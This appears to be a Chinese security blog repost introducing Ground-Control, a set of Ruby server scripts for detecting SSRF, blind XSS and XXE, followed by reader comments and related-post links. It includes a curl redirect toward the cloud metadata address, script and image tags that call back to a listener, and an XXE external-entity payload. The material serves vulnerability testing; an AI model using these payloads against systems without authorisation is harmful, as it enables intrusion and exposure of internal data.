一款用于发现SSRF、XXE、XSS漏洞的小工具

279人阅读 评论(0) 收藏 举报
分类:

今天给大家介绍的是运行在我自己Web服务器中的一堆脚本,这些脚本可以帮助我快速检测SSRF、Blind XXS以及XXE漏洞,喜欢的朋友可以将它们部署到自己的环境中。当然了,你们也可以根据自己的需要来自定义修改脚本代码。

1.png

Ground-Control(GitHub传送门

我这个GitHub库中托管的是我在服务器端所部属的一些安全增强脚本,它们可以检测SSRF(服务器端请求伪造),Blind XSS、以及XXE漏洞。目前本项目仍处于更新过程中,因为我现在还在收集相关的脚本。在使用这些脚本之前,我通常会重写脚本中的部分代码或通过netcat设置监听器。但这样做的灵活性就非常差了,因此我才决定将这些脚本都上传到一个代码库上,这样每当服务器需要使用某个脚本时,我们就可以直接从GitHub代码库中克隆下来即可。

必备条件

脚本的运行需要Ruby 2.3、域名的有效SSL证书、以及一台能够开启端口80、443、8080和8443的Web服务器。端口80和443用来处理简单的Web流量;端口8080也是一个HTTP端口,当端口80无法正常访问时可以用端口8080来处理网络通信数据;端口8443是一个用来处理HTTPS流量的替代段藕,不同的是它需要使用自签名的SSL证书,我可以使用这个端口来判断服务器的SSL证书是否有效。

工具配置

将该项目克隆到本地,然后通过运行“install.sh“来安装本工具的必备组件。依赖组件安装完成之后,运行“start.sh”来监听所有的端口。因为脚本需要监听端口80和433,因此我们还需要root权限才行,但是在将来的版本中我们会尝试通过切换用户环境来解决这个问题。

功能介绍

Redirects

/redirect节点用来将一个请求重定向到另一台服务器或网络节点,当你需要一台外部服务器请求重定向到内部系统时,你可以使用这项功能。使用样例如下:

curl -vv "http://server/redirect?url=http://169.254.169.254/latest/meta-data/"

Ping Pong

有时你可能需要一个能够响应指定body和header的页面,而/ping_pong节点就是你所需要的。使用样例如下:

curl -vv "http://server/ping_pong?body=%3ch1%3eHello%3c/h1%3e"

Blind Callback

如果你想要知道一个无法直接访问的系统是否执行了你的HTML代码或XSS Payload,你可以在config.json文件中添加一个callback_tokens参数,数据结构如下所示:

{
  "callback_tokens": {
    "ee34a1791ab345f789": {
      "host":"hackerone.com",
      "port": 443,
      "ssl": true,
      "path": "/webhooks",
      "parameter": "url",
      "method": "POST"
    }
  }
}

这个callback中包含了攻击目标(插入Payload的地方)的相关信息,如果你收到了一个callback,那么它将可以帮助你验证漏洞出现的根本原因。需要注意的是,其中的每一个参数(parameter、host、port、path和method)都需要拥有自己的callback_token。

你可以根据你所要测试的漏洞类型来构建自己的Payload,下面给出的是针对HTML注入漏洞和XSS漏洞的测试用例。接下来,将你的Payload通过注入点提交给服务器。当带有callback_token的请求被触发之后,你将能够在logs/access_log中查看到日志记录。绝大多数情况下,我会使用命令“tail -f logs/access_log”来查看漏洞和请求的触发情况。

HTML注入:

<img src="https://server/pixel?callback_token=ee34a1791ab345f789" style="display:none;"/>

Blind XSS:

<script src="https://server/collect?callback_token=ee34a1791ab345f789"></script>

XXE:

<?xmlversion="1.0" ?>
<!DOCTYPEr [
<!ELEMENTr ANY >
<!ENTITYsp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>

开启另一台服务器

服务器默认会监听端口80、443、8080、8443,但如果你想开启另外一台服务器来监听其他端口的话,你可以运行命令“ruby app/server.rb -p :port”。如果你想使用SSL,你可以在刚才的命令后面添加“-cert :cert.pem”。当一个潜在的SSRF漏洞只允许我们连接特定端口的话,这个功能就非常有用了。

* 参考来源:jobertabma,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

发表评论

已有 7 条评论

  • LoveSn0w  (1级)  2017-06-17 回复 1楼

    大师傅,早啊,lifai啊

  • dawner  (9级) 黎明已经过去,黑暗就在眼前!  2017-06-17 回复 2楼

    这东西不错,我那边早些时候也在造类似的轮子 :grin:

  • 吹牛逼  2017-06-17 回复 3楼

    这种包括SQL注入,命令注入,都可以用这种模式的。

  • puluter  (1级)  2017-06-17 回复 4楼

    img方式注入能得到cookie吗

  • HappyQQ  2017-06-17 回复 5楼

    转发微博

  • wyldlmu  (1级)  2017-06-17 回复 6楼

    人艰不拆

  • 倾诉  (1级)  2017-06-19 回复 7楼

    支持。。。。。。。。。。

查看评论

XXE漏洞以及Blind XXE总结

转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了Blind XXE漏洞...
  • u011721501
  • u011721501
  • 2015-02-12 23:37:19
  • 20609

XXEinjector – XXE自动化测试工具

项目地址 https://github.com/enjoiz/XXEinjector 项目简介 XXEinjector是一个使用Ruby编写的自动化xxe漏洞检测工具,可以通过给定一...
  • qq_27446553
  • qq_27446553
  • 2016-02-17 11:05:01
  • 1972

XXE漏洞笔记

参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/deta...
  • caiqiiqi
  • caiqiiqi
  • 2017-06-30 02:17:39
  • 545

一款用于发现SSRF、XXE、XSS漏洞的小工具

今天给大家介绍的是运行在我自己Web服务器中的一堆脚本,这些脚本可以帮助我快速检测SSRF、Blind XXS以及XXE漏洞,喜欢的朋友可以将它们部署到自己的环境中。当然了,你们也可以根据自己的需要来...
  • qq_27446553
  • qq_27446553
  • 2017-06-23 11:39:11
  • 279

天翼云一处xxe漏洞可读取任意文件

天翼云一处xxe漏洞 详细说明: 解压缩docx文件,修改word/document.xml 189邮箱的文件预览页存在该问题。 code 区域 ]>...
  • qq_27446553
  • qq_27446553
  • 2015-05-19 10:29:07
  • 1186

安全测试常用几个工具

下面介绍了这些工具的主要功能以及教程、书籍、视频等。 端口扫描器:Nmap Nmap是"Network Mapper"的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具。Nmap被用于...
  • huangjin0507
  • huangjin0507
  • 2016-09-06 20:13:25
  • 19793

xxe漏洞简介

xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函...
  • u011066706
  • u011066706
  • 2016-04-17 21:20:23
  • 1149

2017年十大测试工具你认识几个?

原文地址  http://www.wtoutiao.com/p/131ggBH.html 这份黑客工具列表中的一部分是基于Kali Linux的,其他的工具是通过我们的社区反馈的。 ...
  • u013538542
  • u013538542
  • 2017-02-21 15:10:22
  • 1410

Burp Suite扫描器漏洞扫描功能介绍及简单教程

* 本文作者:pageuo,本文属FreeBuf原创奖励计划,未经许可禁止转载 众所周知,burpsuite是一款非常强大的渗透测试套件。其中包括但不限于各类渗透测试功能,搭配各类插件使用更是渗...
  • qq_27446553
  • qq_27446553
  • 2017-07-29 16:50:41
  • 880
    个人资料
    等级:
    访问量: 92万+
    积分: 9149
    排名: 2576
    最新评论